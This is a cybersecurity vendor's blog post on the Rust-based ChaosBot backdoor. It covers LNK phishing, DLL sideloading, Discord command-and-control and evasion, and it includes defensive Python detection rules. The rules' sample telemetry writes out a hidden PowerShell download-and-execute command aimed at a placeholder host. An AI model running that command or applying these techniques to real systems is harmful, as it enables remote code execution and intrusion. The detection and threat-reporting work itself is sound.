Rust-Powered ChaosBot Exploits Discord for Remote Control of Compromised Devices

10/17/2025 | 3 minute read

A new strain of malware known as ChaosBot is making waves in the cybersecurity community. Written in the Rust programming language, this backdoor is notable for how it uses Discord, a popular chat application, to issue commands and control infected devices remotely.

Unlike many traditional malware families that rely on custom command servers, ChaosBot hides in plain sight by using legitimate communication channels. This clever design makes it harder for organizations to detect malicious activity before real damage is done.

Key Facts About ChaosBot

  • Language: Built in Rust, a fast and memory-safe programming language often favored for new malware development.

  • Primary Function: Remote command execution and system control via Discord channels.

  • First Discovered: September 2025 by eSentire during an investigation at a financial services firm.

  • Main Infection Method: Phishing emails with malicious Windows shortcut (LNK) attachments.

  • Unique Tactic: Uses fake PDF documents to distract victims during installation.

How ChaosBot Works

According to researchers, the attack begins when threat actors gain access to corporate networks using stolen credentials linked to a Cisco VPN and an over-privileged Active Directory account. Once inside, they use Windows Management Instrumentation (WMI) to execute remote commands and spread the infection.

Every compromised device connects to a private Discord channel that the attacker controls. From there, the malware operator known online as “chaos_00019” can send instructions to the infected system. These instructions may include executing PowerShell commands, taking screenshots, or transferring files between the device and Discord.

Deployment and Payload

ChaosBot spreads primarily through phishing campaigns containing malicious shortcut files. When a victim opens the file, a PowerShell command runs in the background, silently downloading and executing the malware. At the same time, a decoy PDF appears on the screen, giving the impression that the attachment is legitimate.

Once executed, the malware loads a malicious DLL (msedge_elf.dll) through Microsoft Edge's legitimate identity_helper.exe process, a DLL sideloading technique that lets the payload run under a trusted, signed binary. It then performs reconnaissance, installs a Fast Reverse Proxy (FRP) to maintain a persistent connection, and waits for further instructions through the Discord channel.

Evasion and Stealth Techniques

ChaosBot incorporates several features designed to avoid detection. It disables Event Tracing for Windows (ETW) to suppress activity logs and checks MAC address prefixes (which identify the network adapter vendor) to determine whether it is running in a virtual machine. If the system appears to be an analysis environment, the malware immediately terminates itself to stay hidden.
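The behaviors described in the three sections above (a shortcut launching a hidden PowerShell downloader, msedge_elf.dll sideloaded through identity_helper.exe, and Discord used as the command channel) each leave telemetry a defender can alert on. The following is an added example, not code from the original post or from eSentire's report: three detection rules in Python run over constructed Sysmon-style records, where the field names (`parent`, `image`, `cmdline`, `loaded`, `host`) and all sample paths are assumptions.

```python
# Added example, not code from the original post or from eSentire's report: a small rule set
# over constructed Sysmon-style telemetry that flags the observable steps described above.
# Field names, paths and sample values are constructed for illustration.
import re
DISCORD_HOSTS = ("discord.com", "discordapp.com", "discord.gg")
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "discord.exe"}
EDGE_DIR = r"c:\program files (x86)\microsoft\edge\application"  # versioned subfolders match too

def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
def check_event(ev: dict) -> list[str]:
    # Returns one label per rule the event matches (empty list for benign events).
    hits, kind = [], ev.get("type")
    if kind == "process":
        parent, image, cmd = _name(ev["parent"]), _name(ev["image"]), ev["cmdline"].lower()
        # Rule 1: shortcut double-click -> explorer.exe spawns a hidden PowerShell that downloads
        if parent == "explorer.exe" and image in ("powershell.exe", "pwsh.exe") \
                and re.search(r"-w(indowstyle)?\s+hidden", cmd) \
                and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", cmd):
            hits.append("hidden_powershell_downloader")
    elif kind == "imageload":
        # Rule 2: msedge_elf.dll loaded by identity_helper.exe outside Edge's install directory
        if _name(ev["image"]) == "identity_helper.exe" and _name(ev["loaded"]) == "msedge_elf.dll" \
                and not ev["loaded"].lower().startswith(EDGE_DIR):
            hits.append("edge_dll_sideload")
    elif kind == "network":
        # Rule 3: Discord traffic from anything that is not a browser or the Discord client
        host = ev.get("host", "").lower()
        if any(host == h or host.endswith("." + h) for h in DISCORD_HOSTS) \
                and _name(ev["image"]) not in BROWSERS:
            hits.append("discord_c2_from_non_browser")
    return hits

def scan(events: list[dict]) -> list[tuple[int, str]]:
    # (event index, finding) pairs for a whole telemetry batch
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]

# Constructed sample telemetry: for each rule, one event that should fire and one that should not.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\alice\AppData\Local\Temp"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application"
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"type": "imageload", "image": TMP + r"\identity_helper.exe", "loaded": TMP + r"\msedge_elf.dll"},
    {"type": "imageload", "image": EDGE + r"\identity_helper.exe", "loaded": EDGE + r"\msedge_elf.dll"},
    {"type": "network", "image": TMP + r"\identity_helper.exe", "host": "discord.com"},
    {"type": "network", "image": EDGE + r"\msedge.exe", "host": "gateway.discord.gg"},
]
```

Running `scan(SAMPLE_EVENTS)` flags only events 0, 2 and 4; the Discord rule will also fire on any legitimate non-browser tooling that talks to Discord, so tune `BROWSERS` to the software actually approved in your environment.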

Why ChaosBot Is Dangerous

The use of trusted platforms like Discord for command and control represents a growing cybersecurity concern. By blending into normal internet traffic, ChaosBot can bypass many network security tools that filter out suspicious connections.

For businesses, this means that traditional defenses are no longer enough. Monitoring communication traffic, restricting privileged account access, and enforcing multi-factor authentication (MFA) are critical measures to help reduce risk.

How Skyriver IT Can Help Protect Your Business

Our cybersecurity experts use advanced monitoring tools, proactive threat intelligence, and proven defensive strategies to safeguard your systems before an attack occurs.

Our cybersecurity solutions include:

  • 24/7 Network Monitoring: Constant oversight to detect and respond to unusual activity in real time.

  • Advanced Threat Detection: AI-driven analysis to identify emerging malware behaviors.

  • Employee Training Programs: Practical phishing and awareness training to reduce user-based risks.

  • Vulnerability and Patch Management: Ongoing assessments and updates to close security gaps.

  • Incident Response and Recovery: Fast containment and remediation to minimize downtime and data loss.

Cyberattacks continue to evolve, but with Skyriver IT as your trusted partner, your business can stay one step ahead of cybercriminals. Contact us today!
